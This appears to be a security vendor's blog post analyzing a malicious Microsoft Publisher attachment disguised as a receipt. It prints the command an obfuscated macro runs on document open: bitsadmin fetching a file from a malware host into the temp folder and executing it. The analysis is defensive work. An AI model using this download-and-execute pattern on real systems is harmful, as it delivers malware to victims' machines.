Analyzing Malware Embedded in MS Publisher Files
We have started to see malware authors use embedded Visual Basic (VBA) macros in many unconventional file types to attack hosts. In response to this trend, VMRay Analyzer V 2.0 now supports the analysis of Microsoft Access and Microsoft Publisher files. Support for analysis of new sample types means greater coverage of an attack surface which in turn equals greater detection capability.
In this post, we review the analysis of a Publisher file associated with an email from email@example.com. The attached file (shown in Figure 1) is disguised as a payment receipt and is titled “FD-Rechnung.pub”.
We first drag and drop the email attachment into the VMRay Cloud where it is immediately recognized as a ‘Microsoft Publisher Document’. On completing the analysis, VMRay Analyzer assigns a severity label of ‘Malicious’ to the sample (Figure 2).
A look at the Overview shows an unusual process tree (See Figure 3). Normally the Microsoft Publisher application (mspub.exe) opens the document and is the only associated process. However, in this case, several other processes are invoked.
After opening the document the following command is executed:
cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND "hxxp://www.doorasope.top/read.php?f=1.gif" "%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit
This command is hidden and embedded in the Publisher document as a VBA Macro which is highly obfuscated and normally hard to extract. Figure 4 shows the macro triggering the function “Document_Open()” when the document is opened.
Since VMRay Analyzer monitors every process, we can extract and see the command that is executed after opening the document (Figure 5). The bitsadmin tool from Microsoft is used to download a file, copy it into the Windows temporary folder and then execute it. The downloaded file can be a Trojan or Ransomware or any other malicious file that the malware author wants to use in the attack. In this analysis, the downloaded file is very likely a Trojan/Bot that first connects to multiple C&C’s (command and control servers).
The choice of the Microsoft Publisher file format may not be the most popular for malware authors but it shows that no file format can be considered safe and free of malicious content. Malware detection and analysis solutions need to ensure that they offer greater coverage area of the attack surface by supporting these sample types.
In this analysis, the VTI Score (shown in Figure 6) shows that the Publisher document executes Visual Basic, creates processes and drops files to the system – all of which constitutes suspicious behavior.
Malware authors use several methods to try and evade detection and analysis systems. Using lesser known or infrequently used file types is one such technique.
However, the research team at VMRay is ready to deal with these evasion techniques.